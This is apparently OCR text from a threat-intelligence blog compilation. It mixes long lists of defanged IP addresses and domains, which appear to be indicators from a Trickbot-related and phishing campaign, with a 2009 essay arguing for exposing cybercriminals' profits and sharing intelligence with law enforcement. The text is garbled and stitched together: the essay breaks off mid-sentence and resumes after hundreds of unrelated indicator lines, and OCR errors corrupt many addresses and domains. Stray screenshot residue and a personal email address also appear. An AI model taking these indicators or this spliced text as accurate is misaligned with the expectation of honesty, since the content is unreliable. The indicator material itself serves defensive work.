185[.]242[.]85[.]194 
195[.]123[.]237[.]153 
185[.]142[.]99[.]8 
185[.]244[.]39[.]65 
5[.]9[.J178[.175 
45[.]138[.]158[.]53 
23[.]239[.]84[.]136 
185[.]68[.]93[.]33 
23[.]239[.]84[.]132 
194[.]5[.]249[.]126 
51[.]89[.]177[.]5 
3[.]88[.]67[.]132 
54[.]185[.]138[.]96 
3[.]95[.]231[.]52 
54[.]236[.]253[.]121 
3[.]135[.]193[.]147 
13[.]58[.J213[.]252 
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3[.]81[.]126[.]82 
54[.]213[.]49[.]29 
3[.]235[.]164[.J215 
3[.]238[.]77[.]5 
18[.]212[.]74[.]215 
3[.]128[.]197[.]68 
54[.]91[.]36[.]142 
54[.]245[.]74[.J151 
3[.]138[.]117[.J231 
173[.]231[.]63[.]82 
173[.]231[.]63[.]98 
173[.]231[.]59[.J124 
172[.]83[.]43[.]136 
45[.]152[.]182[.]147 
193[.]148[.]18[.]68 
172[.]98[.]93[.]227 
66[.]115[.]149[.]227 
193[.]148[.]18[.]35 
45[.]152[.]182[.]131 
45[.]87[.]214[.]214 
89[.]187[.]171[.]243 
193[.]148[.]18[.]86 
84[.]17[.]63[.]12 
89[.]187[.]175[.]137 
45[.]87[.]214[.]198 
93[.]189[.]41[.]213 
134[.]19[.]189[.]187 
185[.]189[.]151[.]142 
95[.]211[.]38[.]161 
134[.]19[.]189[.]196 
54[.]198[.]212[.]211 
3[.]135[.]216[.]86 
217[.]23[.]1[.]184 
185[.]99[.]2[.]49 
91[.J235[.]129[.]151 
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85[.]143[.]223[.]16 
194[.]156[.]98[.]215 
95[.]26[.]211[.]228 
95[.]211[.]95[.]232 
212[.]129[.]41[.]246 
162[.]244[.]81[.]87 
91[.]235[.]129[.]41 
38[.]132[.]113[.]62 
38[.]132[.]96[.]56 
38[.]132[.]96[.]61 
84[.]17[.]52[.]77 
198[.]233[.]175[.]66 
172[.]18[.]9[.]22 
98[.]195[.]11[.]49 
64[.]227[.]113[.]155 
11[.]22[.]33[.]44 
51[.]89[.]177[.]16 
195[.]123[.]241[.]55 
188[.]225[.]33[.]51 
51[.]89[.]177[.]4 
45[.]89[.]127[.]38 
51[.]77[.J112[.]253 
194[.]5[.]249[.]186 
185[.]164[.]32[.]161 
195[.]123[.]241[.]51 
164[.]68[.]116[.]248 
194[.]5[.]249[.]195 
194[.]5[.]249[.]185 
52[.]237[.]163[.]166 
3[.]238[.]75[.]236 
54[.]83[.]253[.]135 
18[.]191[.138[.]26 
142[.]4[.]215[.]34 
141[.]94[.]143[.]79 
185[.]25[.]48[.]4 
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144[.]76[.]64[.]165 
172[.]4[.J1[.]1 
162[.]33[.]178[.]86 
192[.]111[.]146[.]112 
163[.]33[.]178[.]186 
159[.]48[.]55[.]69 
134[.]122[.]91[.]133 
161[.]35[.]223[.]189 
167[.]172[.]46[.]184 
134[.]122[.]48[.]133 
64[.]227[.]75[.]136 
64[.]J227[.]75[.J195 
64[.]227[.]79[.]47 
161[.]35[.]152[.]48 
161[.]35[.]144[.]15 
161[.]35[.]95[.183 
161[.]35[.]95[.]166 
128[.]199[.]54[.]51 
161[.]35[.]144[.]74 
68[.]183[.]3[.]35 
142[.]93[.]135[.]196 
68[.]183[.]14[.]255 
178[.]128[.]245[.]196 
167[.]71[.J11[.]125 
188[.]166[.]99[.]175 
64[.]227[.]68[.]7 
188[.]166[.]32[.]223 
161[.]35[.]69[.]224 
161[.]35[.]77[.]21 
161[.]35[.]69[.]139 
64[.]225[.]67[.]59 
64[.J225[.]71[.J185 
172[.]83[.]155[.]231 
194[.]15[.J113[.]148 
167[.]172[.]37[.]33 
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64[.]225[.]71[.]198 
64[.]227[.]72[.]14 
167[.]172[.]172[.]113 
167[.]172[.]186[.]69 
89[.]82[.]68[.]187 
89[.]41[.]182[.]134 
172[.]83[.]155[.]144 
94[.]158[.]245[.]52 
167[.]172[.137[.]9 
64[.]225[.]71[.]166 
194[.]15[.J112[.]71 
172[.]83[.]155[.]173 
194[.]135[.]33[.]179 
62[.]86[.]245[.]246 
89[.]41[.]182[.]139 
194[.]15[.]112[.]159 
54[.]151[.]54[.]192 
64[.]227[.]72[.]83 
64[.]225[.]67[.]166 
195[.]149[.187[.]46 
134[.]255[.]254[.]76 
45[.]14[.]226[.]182 
161[.]35[.]29[.]127 
161[.]35[.]27[.]53 
161[.]35[.]19[.183 
161[.]35[.]17[.]114 
138[.]68[.]74[.]234 
195[.]133[.]192[.]89 
162[.]33[.]177[.J217 
162[.]33[.]177[.J229 
162[.]33[.]178[.]243 
162[.]33[.]179[.]166 
31[.]13[.]195[.]85 
31[.]13[.]195[.]71 
185[.]183[.]98[.]39 
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194[.]15[.J112[.]35 
147[.]189[.]143[.]13 
31[.]13[.]195[.]189 
31[.]13[.]195[.]188 
87[.J121[.]52[.J223 
31[.]13[.]195[.]154 
31[.]13[.]195[.]126 
87[.J121[.]52[.]126 
31[.]13[.]195[.]113 
5[.]135[.]255[.]247 
192[.]119[.]93[.]26 
31[.]13[.]195[.]133 
45[.]15[.]131[.]126 
193[.]169[.]86[.184 
185[.]99[.]133[.]67 
188[.]127[.]249[.]22 
31[.]13[.]195[.187 
87[.J121[.]52[.]79 
185[.]163[.]45[.]95 
162[.]55[.]32[.]153 
194[.]15[.J113[.]155 
188[.]127[.]235[.]177 
148[.]163[.]42[.]213 
188[.]127[.]251[.J111 
31[.]13[.]195[.J125 
185[.]99[.]132[.]248 
45[.]14[.]226[.]23 
5[.]255[.]97[.]185 
194[.]76[.]227[.]89 
84[.]32[.]188[.]136 
192[.]119[.]162[.]97 
194[.]76[.]227[.]98 
45[.]128[.]149[.]42 
26[.]85[.]198[.]164 
172[.]96[.]188[.]72 
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45[.]131[.]66[.]226 
194[.]76[.J224[.]142 
247[.]15[.]67[.]234 
129[.]246[.]14[.]238 
66[.]129[.]29[.]194 
5[.]2[.]75[.]193 
251[.]252[.]181[.]63 
173[.]232[.]146[.]167 
161[.]35[.]147[.]41 
161[.]35[.]147[.]242 
165[.]227[.]131[.]219 
165[.]227[.]136[.]95 
159[.]65[.]18[.]134 
165[.]227[.]232[.]39 
172[.]83[.]155[.]218 
194[.]135[.]33[.]147 
165[.]22[.]29[.]88 
165[.]22[.]25[.]38 
165[.]22[.]25[.]74 
165[.]22[.]21[.]42 
165[.]22[.]21[.]98 
139[.]28[.]235[.]249 
185[.]153[.]198[.]223 
18[.]188[.]249[.]247 
185[.]25[.]48[.]83 
89[.]41[.]182[.]96 
18[.]217[.]68[.]134 
3[.]15[.]217[.]84 
13[.]58[.]242[.]166 
5[.]9[.]72[.]123 
62[.]141[.]37[.]63 
172[.]31[.]1[.]2 
66[.]29[.J138[.]17 
1[.]2[.]31.14 
34[.]222[.]222[.]126 
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9. http: //ddanchev. blogspot .com/2008/09/estdomains-and-intercage-vs- cybercrime. htm 


10. http: //ddanchev.blogspot .com/2008/01/e-crime-and-socioeconomic-factors.htm 
11. http: //ddanchev.blogspot.com/2008/10/money-mules-syndicate-actively.htm 


12. http://ddanchev.blogspot .com/2008/06/price-discrimination-in-market-for.htm 
13. http: //ddanchev. blogspot .com/2008/07/are-stolen-credit-card-details-getting.htm 


14. http: //ddanchev.blogspot.com/2007/03/underground-economys-supply-of-goods.htm 


5.1.2 Squeezing the Cybecrime Ecosystem in 2009 (2009-01-06 15:31) 


How do you trigger a change that would ultimately affect the entire cybercrime ecosystem? 
Going full disclosure may be the most logical option, but past experience reveals that using it 
has a modest temporary effect. For instance, exposing a stolen credit cards shop isn’t going 
to separate the owner from the stolen database, neither would his customers base disappear, 
so stating that it’s shut down in reality means that it’s currently active at another location 
which the owner quickly communicates to the customers base. | keep seeing it happen once 
a sample service gets media attention, and I'll keep seeing it happen. 


The myth that geolocating their malicious activities would always end up in an Eastern 
European network where developed law enforcement agencies would have little to no 
jurisdiction at all, proved to be a [1]common stereotype given [2]that the well known 
[3]cybercrime-friendly ISPs that were shut down in 2008 were and have always been U.S 
based operations. Therefore, the excuse of not being able to take action due to the lack of 
international law enforcement cooperation isn’t appicable in this case. 


So how should the cybercrime ecosystem be squeezed? Personalize it and communi- 
cate the levels of efficiency cybercriminals achieve by using the very same disturbing photos 
that they use to demonstrate the effectiveness of their web based stolen credit card shops in 
order to achieve the necessary public outbreak. 
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89[.]32[.]41[.]184 
192[.]99[.J255[.]32 
194[.]5[.]249[.]156 
134[.]119[.]191[.138 
52[.]13[.]154[.]32 
34[.]238[.]84[.]181 
3[.]137[.]174[.]178 
194[.]5[.]249[.]46 
54[.]212[.]16[.]8 
125[.]125[.]125[.]125 
5[.]181[.]156[.]226 
3[.]86[.]163[.]159 
3[.]91[.]47[.]199 
3[.]139[.]97[.]6 
18[.]236[.]63[.]179 
52[.]37[.188[.]45 
195[.]123[.]243[.]19 
34[.]239[.]246[.]132 
54[.]196[.]129[.]197 
161[.]35[.]18[.]18 
161[.]35[.]19[.]72 
68[.]183[.]67[.]197 
159[.]65[.J127[.]51 


Sample related screenshots of the Trickbot malware gang: 


[60] 


20633 


20634 


[61] 


[62] 


[63] 


© © © © 


Bentley 106837 


Manuel 49688 
Target 30473 
He 30057 
Mushroom 27221 
Ha 20712 
Fire 19641 
Angelo 17432 
Yto 17376 
Deploy 15904 
fla 18723 
Wild 14717 
Nipuser 14091 
Ox 12558 
Kax 11796 
310 11373 
No 10416 
To 9801 

[ 64 ] Bee 9027 
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= deploy " https 


a ww manuel ye ntley 
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file 4 er megory Uarn ar 
exe 


bree elroy rocco 


[67] 
20635 


®) ® 


mitchjacob131@gmail.com 


[68] 
Sample domains involved in the campaign include: 
sub2[.]aacd7351758ca803a50b26cf016c46fd[.]xyz 
mx01[.]cxmdil.]ru 
crystallfax[.]info 
mxO[.]cxmdil.]ru 
la4[.]h1118[.]net 
seed[.]bitcoin[.]wiz[.]biz 
ip28[.Jip-51-89-125[.Jeu 
x9[.]seed[.]btc[.]petertodd[.lorg 
x8[.]dnsseed[.]bluematt[.]me 
seed[.]bitnodes[.]io 
wmcn[.]analogfedora[.]club 
carrierbilling-etransfer[.]ca 
emailsrangevip[.]us 
mail[.]Jemailgate[. ]digital 
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emailgate[.]digital 

mail[. ]tikiwestside[.]com 
mail[.]emailsrangevip[.]us 
server[.]cxmdil.]ru 
serverl1[.]cxmdil.]ru 
mx[.Jcxmdil.]ru 
sub2[.Jaacd7351758ca803a50b26cf016c46fd[. ]xyz 
crystallfax[.]info 
la4[.Jh1118[.]net 
host[.]colocrossing[.]com 
ip28[.]Jip-51-89-125[.Jeu 
192-3-247-116-host[.]colocrossing[.]com 
wmcn[.]analogfedora[.]club 
gate3[.]piratial.]info 

free[.]ds 

emailsrangevip[.]us 

i[. ]donald741[.Jexample[.]com 
mail[.]emailgate[.]digital 
an-partner[.]com 
emailgate[.]digital 
mail[.]tikiwestside[.]com 
tbidedicated[.]Jexample[.]com 
mail[.]emailsrangevip[.]us 
test[.]record[.]Jcom 
mx01[.Jcxmdil.]ru 
free[.]mgnhost[.]com 
mxO[.]cxmdil.]ru 
vds90002[.]mgn-host[.]ru 
vds95060[.]mgn-host[.]ru 
mgn1[.]fub 

seed[. ]bitcoin[.]wiz[.]biz 
dnsscan[.]shadowserver[.]org 
x9[.]seed[.]btc[.]petertodd[.Jorg 
x8[.]dnsseed[.]bluematt[.]me 


reverse[.]hostingbb[.]Jcom 
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seed[.]bitnodes[.]io 
carrierbilling-etransfer[.]ca 
server[.]cxmdil.]ru 

server1[.]cxmdil[.]ru 
vds84796[.]mgn-host[.]ru 
mx[.Jcxmdil.Jru 

Related malicious domains known to have been involved in the campaign: 
secure-chase-verify[.]dynamic-dns[.]net 
cpcontacts[.]87-121-52-223[.]cprapid[.]Jcom 
www [.]secure-chase-verify[.]dynamic-dns[.]net 
87-121-52-223[.]cprapid[.]com 
6ad9982a74e831b2[.Jakamaidn[.]org 
c6sa[.]mastercar[.]guru 
thebalance[.]Jcom 

islamweb[. ]net 
b651d9d3831d0e5c[.]yahoodns[.]edu 
protothema|[.]gr 
rakuten[.]card-yoe[.]net 
rakuten[.]card-suc[.]jp 
rakuten[.]card-ds[.]com 
rakuten[.]card-raa[.]net 
box[.]export-argan[. ]tk 
rakuten[.]card-yoe[.]jp 
applemusic3-dynu[.]ddns[.]net 
letzteregierungssprengung[.]Jat 
dhddjdjdu-dynu[.]ddns[.]net 
maill.Jsyscalloverflow[.]Jcom 
youroptinoffers[.]Jcom 

www [.]youroptinoffers[.]com 
christiandior[.]lbag[.Jorg 
chat[.]blockchainfol[. info 
coach[.]lbag[.Jorg 

onroeken|. bazar 

wwwIl[.]pchanel[.]Jcom 

hoopkins[.]Jcom 

20638 


ultimatured[.Jcom 
sexyteenlivecam[.]com 
security-accounts-access[.]com 
159-48-55-69[.]d096534c06b9407fb0890cc4b29769de[. ]plex[.]direct 
www. ]Jultimatured[.]Jcom 
159-48-55-69[.]860286cf87774e0489f700a5b197cb6e[.]plex[.]direct 
159-48-55-69[.]1c5le7eb2a0d4233806985da50e00162[.]plex[.]direct 
159-48-55-69[.]74ac49f0b78b45488381bce85cd9a5e6[.]plex[.]direct 
159-48-55-69[.]d89c39927adc4b249b2f92e3147ac201[.]plex[.]direct 
tmt[.]Jmghome[.]xyz 
xn-elard[.]center-credit[.Jorg 
sea[.]uooh[.]cn 
xn-dlabkf4ap[.]center-credit[.Jorg 
z[.]pii[.Jat 
n2u2[.]zc20200426[.]club 
shophoof[.]com 
wwwl.]shophoof[.]com 
ec2-3-238-75-236[.]compute-1[.]amazonaws[.]com 
way[.]confusedance[.]com 
89-82-68-187[.]abo[.]bbox[.]fr 
jjmk[.Jorg 
idcewyed[.]bazar 
vol75-h10-89-82-68-187[.]dsl[.]sta[.Jabo[.]bbox[.]fr 
ekxeidyw[.]bazar 
zaustug[.]ru 
chat[.]anti-credit[.]su 
ny[.]usa[.]bba-f[.]aluminum-zinc-diecasting[.]com 
tokarevs213ftp[.]tokarevs[.]ru 
mta03[.]Jarrowdo[.]info 
f64blefba7b048d631dfe3ea5a59cd04a291986b9fbada8296[.]www2[.]google [.]Jcom 
bancabva[.]mobi 
bbvapp[.]mobi 
diffracts[.]rubikal[.]Jir[.]Jrubika[.]kim 
tank[.]mtproxygo[.]xyz 
sepad[.]hotspotproxyl. ]xyz 
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hwsrv-928570[.]hostwindsdns[.]com 
jy3x5i8q[.]hotspotproxy[. Icf 
wsrv-797612[.]5[.]zedudaba[. ]online 
meybakh[.]rubikal[.]Jir[.Jrubika[.]kim 
mysharedfiles[.]net 
hml01[.]punonnage[. linfo 
electricnetstats[.]com 
mta01[.]pinchloge[.]club 
mhxk-79e37f[.]try9[.]net 
mhxk-a54d98[. ]Jdiltwo[.]com 
mhxk-7fb748[.]try9[.]net 
tonsillotomies[.]bomb[.]blue 
erotomanial.]highspeed[.]best 
wwwl.let-ca-7721[.]live 
mail[.]wesulangu[.]Jcom 
painel2[.]multitarefas[.Jonline 
bronze[.]stellarcrazy[.]net 
www/l[.]divert-hosting[.]Jcom 
bestluckyxhookup[.]com 
sorting[.]screench[.]org 
hrowbeahbrizvar[.]tk 
w-coinbase[.]com 
catransfer33677[.]live 
wwwl!.]catransfer33677[.]live 
levelpvp[.]de 

552[.]tzqn[.]xyz 
3rpm[.]runforestrun[.]ru 
mail[.]Jcomputare[.]ru 
b37b[.]runforestrun[. ]ru 
bgptools-wildcard-confirmed[.]zfmkil[.]xyz 
dc-2cOb3e5b0ffe[. ]topkingtd[.]Jcom 
okifavug[.]com 
puromeditation[.]Jcom 
www[.Jokifavug[.]Jcom 
shop[.]weamateur[.]Jcom 
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zimbra[. ]taille-2748[.]newerascore[.]Jcom 
mx5[.]newerascore[.]com 
mail8[.]newerascore[.]Jcom 
mailin[.]taille-2748[.]newerascore[.]Jcom 
m[.]taille-2748[.]newerascore[.]com 
mail[.]sellhere[.]trade 
ns2[.]sellhere[.]trade 
sellhere[.]trade 
a035-signall[.]kotpusk[.]ru 
server5[.]dinglara[.]com 
wwwl[.]corespondent[.]de 
webmail[.]gamersbackyard[.]de 
tontechnik[.]gamersbackyard[.]de 
ap[.]zgtk[.]net[.]Jcn 
do-not-reply[.]gamersbackyard[.]de 
wwwI[.]ozon-sochil.]ru 
I93ale2f[.]justinstalledpanell.Jcom 
wantamateur[.]com 
dev[.]cangobag[.]ru 
cas[.]wrynicfl[.JolimpbOrt[.]xyz 
mx5[.]razno[.]rashieturtia[.]Jcom 
smtp2[.]razno[.]rashieturtia[.]com 
www[.]xxxtoonhub[.]com 
mx20[.]razno[.]rashieturtia[.]Jcom 
future[.]churchice[.]com 
ms1[.]razno[.]rashieturtia[.]com 
xxxtoonhub[.]com 
server1[.]razno[.]rashieturtia[.Jcom 
ip28[.]Jip-51-89-125[.Jeu 

www. ]sellhere[.]trade 

lacroix[. ]duocoffee[.]net 
host4[.Jarriagalead[.]com[.]br 
buchannansteven34[.]pserver[.]ru 
www[.Jhost4[.]arriagalead[.]com[.]br 


vpslot[.]com[.]pserver[.]ru 


20641 


tokiyocomwpyl.]xyz 

box[. ]tokiyocomwpyl[.]xyz 
irL.]filimol. ]cf 
ip-161-35-29-127[.]lazerpenguin[.]com 
mx[.]account-notices[.]net 
wwwl[.]Jaccount-notices[.]net 
adrollusa[.]Jcom 

montunodance[.]net 
deposit-gov-canada[.]com 
wwwl([.]montunodance[. ]net 
smtps[.]account-notices[.]net 
smtp[.]montunodance[.]net 
gnyal[.]Janalogfedora[.]club 
cs[.]gibert[.]nonicoidek[.]com 
mailgw[.]gibert[.]nonicoidek[.]com 
ns2[.]gibert[.]nonicoidek[.]Jcom 
internet[.]gibert[.]nonicoidek[.]com 
webmail[.]gibert[.]nonicoidek[.]com 
mor3bfoucchn[.]com 
wwwI!.]buldschoolt[.]Jcom 
weeregritse[.]Jcom 

passwd-3906[. Javidpacket[.]net 
crazymane[.]com 
homeownersoffers[.]site 
mta26[.]mail[.]static[.Jau5304wr4j[.]net 
savedevil[.]Jcom 

crimsonratio[.]Jcom 
ec2-54-151-54-192[.]us-west-1[.]compute[.Jamazonaws[.]com 
www [.]dragonrage[.]xyz 
pub-bkn19-c61-cloud[.]druva[.]Jcom 
insyncbackup-pub-bkn19-c61-cloud[.]druva[.]Jcom 
gflocculator[. Jiproxy[.]cloud 

gbeseech[. Jiproxy[.]cloud 
gstatued[.]iproxy[.]cloud 
gskimmias[.]iproxy[.]cloud 
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Even though | pretend that the research and profiles of the underground tools and ser- 
vices that I’ve been detailing throughout 2008 is cutting-edge research, this research is 
basically scratching the surface, but how come? Just like there’s a perfect and bad timing for 
a particular product or service to hit the market, in this very same fashion the general public 
is still not ready to embrace some of the highly disturbing point’n’click identity theft services 
that have been operating for years. Sadly, some even question the usability and authenticity 
of these underground services, and therefore a change has to be triggered by starting to 
publish the cybercriminals’ ROI out of using them in the form of the photos of users swimming 
in cash that they’ve cashed-out of the stolen credit cards. Disturbing? It’s supposed to be, 
since it will not only prompt public outbreak, but also, have a well proven self-regulation effect 
on behalf of the service owner’s, at least from my personal experience while profiling related 
services. 


This is perhaps the perfect moment to emphasize on how important threat intell sharing 
with law enforcement, whether directly based on personal contacts or through one-to-many 
communication model through private mailing lists, a cyber threats analysts case-building 
capabilities would not only prove valuable in the long term, but would also make it easier for 
someone to do their prosecuting job faster. And while important, threat intell sharing with 
law enforcement is not the panacea of squeezing the cybecrime ecosystem, since cybercrime 
should not be treated as the systematic abuse of common IT insecurities for fraudulent 
purposes, instead, it should be treated as a form of economic terrorism. Only then, would 
cybercrime receive the necessary attention instead of [4Jsuch comments regarding McColo 
or Atrivo - "Resource-wise, we can’t be in the business of prevention. We have to be in the 
business of prosecution." Exactly. | guess that just like you cannot be a prophet in your own 
country, you cannot also be a prophet in your own agency, thankfully, the wisdom of the 
cybercrime fighting crowd is always there to take care and get zero credit at the end of the 
day. 


Personally, 2009 is going to be the year when personalizing cybercriminals would be taking 
place on a more regular basis, so stay tuned for an upcoming report summarizing "behind the 
curtains" cybercrime activities in 2008, underground responses to some of major busts of year 
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modindmry[.]mytradecryptousa[.]Jcom 
194-135-33-179[.]static[.]ktkru[.]ru 
wwwl[.]purposeload[.]com 
www[.]visehight[.]com 
gsmriti[.]Jiproxy[.]cloud 
167-172-37-9[.]cprapid[.]com 
max[.]sardar[.]red 
scomritiambarks[.]Jcom 
112[.]mtproto[.]world 
ns1[.]buylevitraonline[.]net 
www[.]sogouyy[.]com 
www[.]seaap[.lorg 
wwwl[.]buylevitraonline[.]net 
wylkan4game[.]com 
mtspeed[. ]xyz 
dauauyhasaa[.]kozow[.]com 
jensfunbags[.]com 
server1[.]symphonor[.]com 
litereach[.]Jcom 
fluffyninjas[.]Jcom 
30iwyp[.]beintube[.]net 
ff[.]pil[.]Jde 
balan[.]irancell[.Jdynu[.]com 
uminil[.]wolf[.]kozow[.]com 
dungs[.]apadanal[.]xyz 
london[.]shell[.]giize[.]com 
halle[.]leon[.]mywire[.]org 
ns1[.]labrie[.Jca 
severianus[.]severianus[.]philippguizar[.]club 
ipv6[.]Jchez-oim[.]org 
wwwl[.]ursulapapst[.]xyz 
ns502530[.]ip-142-4-215[.]net 
eoursyqaaip[.]ursulapapst[.]xyz 
soyoustart[.]ca 
nsl[.]ns2[.]philippguizar[.]club 
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coppa[.]chez-oim[.]lorg 
en[.Jursulapapst[.]xyz 
66033644-241433061[.]ldb-connect[.]nl 
mailer[.]ldb-connect[. Jn! 
prepmonal1[.]lim[.]mobi 

r[. ]deployments[. ]trendsurfers[.]ru 
*[.]ldb-connect[.]nl 
arweave-biikbggkjjkohfx[.]shoppynext[.]com 
trackupdown[.]site 

clefschat[.]Jcom 

ipsec[. opera-ipsec[.]net 
macdontrans[.]Junmsapp[.]Jcom 
trashastu[. ]xyz 
mvs-benchmark-every[.]dignityfile[.]Jcom 
stialtere[.]xyz 

skyatekell[.]xyz 

spendraba|[.]xyz 

gricssa[.]Jcom 
dev01-brutesque[.]duckdns[.]org 
wwwI[.]gricssa[.]com 

festa[.]renor[.]me 

diabetes[.Jelgoog[.]gr 

emy[.]Jelgoog[.]gr 
mongo[.]diabetes[.]elgoog[.]gr 
dimitris[.]elgoog[.]gr 

elgoog[.]gr 

glennhodl[.]Jme 

wwwl[.]glennhodI[.]Jme 
host-62-86-245-246[.]business[.]telecomitalial[. Jit 
host246-245-static[.]86-62-b[.]business[.]telecomitalia[.]it 
ehadezsrsbmzov[. ]betboy[.]hk 
z4yewr9w/uyl[.]wangzinian[.]com 
sjofsfapchkvkzsb[.]ring[.]xskcl[.]Jcn 
iixzdhnjppk[.]wwwl[.]ps780[.]Jcom 
transgenics[.]hotspotproxy[.]xyz 

20644 


jy4jnoxs[.]hotspotproxy[.]cf 
jx2320gz[.]hotspotproxy[.]cf 
medium[.]hotspotproxy[.]xyz 
trowed[. ]hotspotproxy[.]xyz 
recursing-haibt[.]173-232-146-236[.]plesk[.]page 
www[.]onlinemobilityref-ca0426[.]com 
ns1[.]iphonetank[.]Jcom 
ImpgwlI.]Janalogfedoral[.]club 
create-date[.]badwand[.]com 
wwwI[.]lopenlab-blueprint[.lorg 
eqsignin[.]karopiyam[.]com 
eqsecure[.]openlab-blueprint[.Jorg 
ns3[.]karopiyam[.]com 
hostmaster[.]openlab-blueprint[. Jorg 
mbmjwt[.]tengyin66[.]com 
admin[.Jalgolumen[.]info 
webmaill[.]cdn-icloud[.]co 
maill[.]ticket[.]kiev[.Jua 
mail[.]xn-90aiimOb[.]Jod[.]ua 
morvokzal[.]Jcom[.]ua 
wwwl[.]xn-90aiim0b[.]com[.]ua 
api[.]xn-90aiimO0b[.]com[.]ua 
v1[.]softd[.]ir 
dc-17408122adca[.Jmha/7[.]ir 
hOstsail2r[.]pOo9i8[. tk 
hOstsailOr[.]p0o9i8[. ]tk 
carrierbilling-interactransfert[.]website 
binance[.]esnprotected[.]Jcom 
mail[.]edithcleaningservice[.]com 
f142651[.]hopto[.]org 
fod1234[.]ddns[.]net 


5184619507f13fcd8e056b9flefdb94373a86e9c995d19003b[.]www2[.]besteklei nwagen[- 
.Jcom 


user[.]cdn-icloud[.]co 
cdn-icloud[.]co 
wwwl[.]cdn-icloud[.]co 
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cityadd[. ]site 

ns1[.]byteher[.Jicu 
ops[.]mtnirancell[.Jgq 
wwwl.]byteher[.]icu 
ksnnt[.]sardar[.]red 

www [.]guytell[.Jicu 
mrhaji3[.]sardar[.]red 
ns1[.]ifleaf[.]site 
sorat[.]mtp[.Jone23[.]uno 
sec[.]recordedhistories[.]net 
kirsti[. ]}Wwabusiness[. ]site 
undergrOundz[.]ml 
wvcurjvcugc[.]duckdns[.]org 
tele[.]159[.]jp 
wwwl[.]wvcurjvcugc[.]duckdns[.]org 
mail[.]undergrOundz[.]ml 
wwwl[.]Jwww[.]wvcurjvcugc[.]duckdns[.]Jorg 
cumbatv[.]ddns[.]net 
mail5[.]profithacks[.]Jcom 
aldebaran[.]dyndns[. ]tv 
mtal[.]profithacks[.]Jcom 
paycnqbancontact[.]chedval[.]net 
server1[.]profithacks[.]com 
sagi-toptv[.]myddns[.]me 
ns1[.]profithacks[.]com 
lotitopresidente[.]ddns[.]net 
profithacks[.]com 
ip76[.]ip-164-132-76[.]eu 
takeitl06[.]xyz 

takeit101[.]xyz 
proxy[.Jaraturbo[.]xyz 
takeit105[.]xyz 
gifted-mahavira[.]161-35-17-114[.]plesk[.]page 
takeit104[.]xyz 
ferraial[.]joeyates[.]info 
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takeit10O[. ]xyz 

winnipegplans[.]com 

smtp1[.]healthtipspack[.]de 

mail11[.]healthtipspack[.]de 

server2[.]healthtipspack[.]de 

smtpO1[. ]healthtipspack[.]de 

nqkfrvehbhcedet[.]ol-eg[.]ru 

www[.]greencrow[.]ru 

gisig[.]net 

greencrow[.]ru 

7[.Jsharzh22[.]Jcom 

mailout[.]culturedtax[.]Jcom 

mta-sts[.] _dmarc[.]breakerjump[.]duckdns[.]org 
portal[.]culturedtax[.]Jcom 

katalog[.]culturedtax[.]com 

pop3[.]culturedtax[.]com 

pinkprx[.]sbs 

mci[.]gtiran[.]store 

1050[.]geforce-rtx[.]sbs 

abc[.]melobot[. ]fyi 

falcon——_———_——— yey——_————- live[.]Jc————— —IlI[.]book———-—_——- com[. ]tk 
136[.]84[.]239[.]23[.]static[.Jreverse[.Jas19531[. ]net 
make-hex-32332e3233392e38342e313336-rr[.]1ul.Jms 
gilroyelks[.]ddns[.]net 

www[.]54-212-16-8[.]cprapid[.]com 
ec2-54-212-16-8[.]us-west-2[.]compute[.]Jamazonaws[.]com 
54-212-16-8[.]cprapid[.Jcom 

reking2[.Jdynu[.]net 
185-217-117-127[.]abf42ec15cc34f869b620ec1b4c19b5e[.]plex[.]direc t 
185-217-117-127[.]7570689ac47b45e19e230e70487a9178[.]plex[.]Jdirec t 
185-217-117-127[.]aa24d23d25f74030879f831ccc48b8f9[.]plex[.]direc t 
orgerp[.]xyz 
185-217-117-127[.]ff9733a27cc5433aa4b51f90e66826e8[. ]plex[.]direc t 
ec2-3-91-47-199[.]compute-1[.]amazonaws[.]com 


bombproxy|[.]pro 
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ayo[.]seraphtechnology[.]com 
www1-validatechk-logon[.]mx-membership-auth[.]com 
gov-ato-au-ssltrue-secure-active[.]nab-verify[.]net 
sncrp-lgnaccbueikfkel0912wkdowkd[.]globalverfchk[.]com 
westpac-ssltrue-secure-dashboard[.]membership-reward-logon[.]Jcom 
community[.]flaunt7[.]com 

kindsoftpron[.]top 
195-91-226-161[.]60f5c1e14f2b4ab19448f09485c3914f[. ]plex[.]direct 
mail[.Jonetop[.]ml 
orjinal-nokia-phone[.]the-best-iphone[.]xn-6frz82g 
mi-nokia-phone[.]the-best-iphonel[.]xn-6frz82g 
berber[.]khamenei-ir[.]gq 

kavkazhotell[.]ru 

wwwl[.]zmqb[.]net 

home|[.]os-developer[.]n| 

ipmirror[.]radio[.]fm 

lifeifan[.]top 

smtp[.]tinkkov[.]ru 

xinjiangmoon[.]com 

beggings[.]top 

mta[.]tinkkov[.]ru 

vindurualeg[.]top 

mail[.Jereplystopdigital[.]us 

extrimefigim[. ]top 

akb4[.]ru 

mailrelay[.Jalonicatere[.]com 

info[.]so-deca[.]Jcom 

reference[.]so-deca[.Jcom 

wediero[.]com 

wwwI!.]wediero[.]com 
ec2-52-13-154-32[.]us-west-2[.]compute[.]amazonaws|[.]com 
wwwl[.]bignumps[.]Jcom 

bignumps[.]Jcom 

auth[.]prismatical[. Jai 

www/[.]in-biz[.Jorg 
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huawei-nokia-lumia-in-hand-phone[.]the-best-iphone[.]xn-6frz82g 
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including the DarkMarket operation, the fraudulent schemes allowing them to cash-out digital 
assets into hard cash, the basics of their social networking model, who’s who in the hierarchy 
of a sampled business model of vendors of ATM skimming devices, the post-DarkMarket 
OPSEC practices introduced in order for cybecrime communities to verify the authenticity of 
their customers, the process of advertising and operating underground services as well as the 
communication methods used, in short - all the juicy details, screenshots and photos courtesy 
of the owners and customers of the services that haven’t been communicated to the industry 
and the world throughout 2008. 


Find attached a photo teaser acting as a confirmation for the usefulness of "yet another 
stolen credit card details service" in the wild, and have a productive year exposing low lifes 
and spilling coffee over their business models. 


Related posts: 

[5]76Service - Cybercrime as a Service Going Mainstream 
[6]Using Market Forces to Disrupt Botnets 

[7]Localizing Cybercrime - Cultural Diversity on Demand 
[8]Localizing Cybercrime - Cultural Diversity on Demand Part Two 
[9]EstDomains and Intercage VS Cybercrime 

[10]E-crime and Socioeconomic Factors 

[11]Money Mules Syndicate Actively Recruiting Since 2002 
[12]Price Discrimination in the Market for Stolen Credit Cards 
[13]Are Stolen Credit Card Details Getting Cheaper? 

[14]The Underground Economy’s Supply of Goods 


. http: //blogs.zdnet .com/security/?p=2089 
. http://blogs.zdnet.com/security/?p=2281 
. http: //blogs.zdnet .com/security/?p=2006 
